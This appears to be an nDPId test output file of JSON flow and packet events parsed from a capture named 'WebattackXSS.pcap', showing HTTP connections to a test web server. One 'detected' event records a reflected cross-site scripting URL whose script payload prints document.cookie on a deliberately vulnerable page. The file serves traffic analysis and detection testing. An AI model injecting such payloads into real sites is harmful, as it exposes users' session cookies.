+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"finished","flow_packets_processed":316,"flow_first_seen":1499347872187,"flow_last_seen":1499347941610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347936727,"flow_last_seen":1499347941876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347940593,"flow_last_seen":1499347945883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348072088,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348072088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348073365,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348073365,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pg1AAD4Gh8OsEAABwKgKMotiAFCjeCG\/AAAAAKACchDtKgAAAgQFtAQCCAoBPR+yAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":2,"flow_last_seen":1499348073365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348073365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi2IT1M33o3ghwKAScSAXMQAAAgQFtAQCCAoD5vEmAT0fsgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9164,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":3,"flow_last_seen":1499348073366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348073366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Pg5AAD4Gh8qsEAABwKgKMotiAFCjeCHAE9TN+IAQAOW2NwAAAQEICgE9H7MD5vEm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348074670,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348074670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OC5AAD4GjaKsEAABwKgKMotwAFDSMxjXAAAAAKACchDGAgAAAgQFtAQCCAoBPSD5AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":2,"flow_last_seen":1499348074670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348074670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi3D0f4w30jMY2KAScSBP1gAAAgQFtAQCCAoD5vJtAT0g+QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":3,"flow_last_seen":1499348074671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348074671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OC9AAD4GjamsEAABwKgKMotwAFDSMxjY9H+MOIAQAOXu3QAAAQEICgE9IPkD5vJt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348077218,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348077218,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HtAAD4G9VSsEAABwKgKMouKAFBc0\/MNAAAAAKACchBelQAAAgQFtAQCCAoBPSN2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":2,"flow_last_seen":1499348077218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348077218,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi4oOSV5eXNPzDqAScSD5+wAAAgQFtAQCCAoD5vTqAT0jdgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":3,"flow_last_seen":1499348077219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348077219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HxAAD4G9VusEAABwKgKMouKAFBc0\/MODkleX4AQAOWZAwAAAQEICgE9I3YD5vTq"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348078531,"flow_last_seen":1499348078531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348078531,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1499348078531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078531,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86yNAAD4G2qysEAABwKgKMouYAFAizM+dAAAAAKACchC6tgAAAgQFtAQCCAoBPSS+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9205,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":2,"flow_last_seen":1499348078532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348078532,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi5glYndPIszPnqAScSAkywAAAgQFtAQCCAoD5vYyAT0kvgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":3,"flow_last_seen":1499348078532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348078532,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06yRAAD4G2rOsEAABwKgKMouYAFAizM+eJWJ3UIAQAOXD0gAAAQEICgE9JL4D5vYy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348081113,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P1ZAAD4GhnqsEAABwKgKMouyAFAGWhgVAAAAAKACchCMEgAAAgQFtAQCCAoBPSdDAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9226,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":2,"flow_last_seen":1499348081113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348081113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi7IGSc2TBloYFqAScSC8dgAAAgQFtAQCCAoD5vi3AT0nQwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9227,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":3,"flow_last_seen":1499348081114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348081114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P1dAAD4GhoGsEAABwKgKMouyAFAGWhgWBknNlIAQAOVbfQAAAQEICgE9J0QD5vi3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 